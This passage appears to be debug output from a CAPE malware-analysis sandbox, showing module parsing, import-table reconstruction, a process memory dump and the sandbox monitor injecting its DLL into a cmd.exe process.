2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:37,520 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:37,536 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,707 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,941 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:37,941 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:37,941 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,957 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:37,957 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:37,957 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x4A1A0000
2020-03-24 10:13:37,957 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x4A1A829A
2020-03-24 10:13:37,973 [root] DEBUG: Module image dump success
2020-03-24 10:13:37,973 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x4a1a0ffc, size: 0x3a4
2020-03-24 10:13:37,989 [root] DEBUG: IAT parsing finished, found 229 valid APIs, missed 0 APIs
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: winbrand.dll
2020-03-24 10:13:37,989 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:37,989 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:38,003 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:38,003 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1340_69771570438132024232020
2020-03-24 10:13:38,066 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1340.dmp.
2020-03-24 10:13:38,066 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:38,082 [root] INFO: Notified of termination of process with pid 1340.
2020-03-24 10:13:43,089 [root] DEBUG: set_caller_info: Adding region at 0x04C60000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:43,137 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2444
2020-03-24 10:13:43,151 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:43,151 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:43,151 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:43,151 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:43,151 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:43,167 [root] DEBUG: Loader: Injecting process 2444 (thread 1472) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,167 [root] DEBUG: Process image base: 0x4AAD0000
2020-03-24 10:13:43,167 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,167 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:43,167 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,184 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2444
2020-03-24 10:13:43,184 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2444
2020-03-24 10:13:43,184 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:43,184 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:43,184 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:43,184 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:43,198 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:43,198 [root] DEBUG: Loader: Injecting process 2444 (thread 1472) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,198 [root] DEBUG: Process image base: 0x4AAD0000
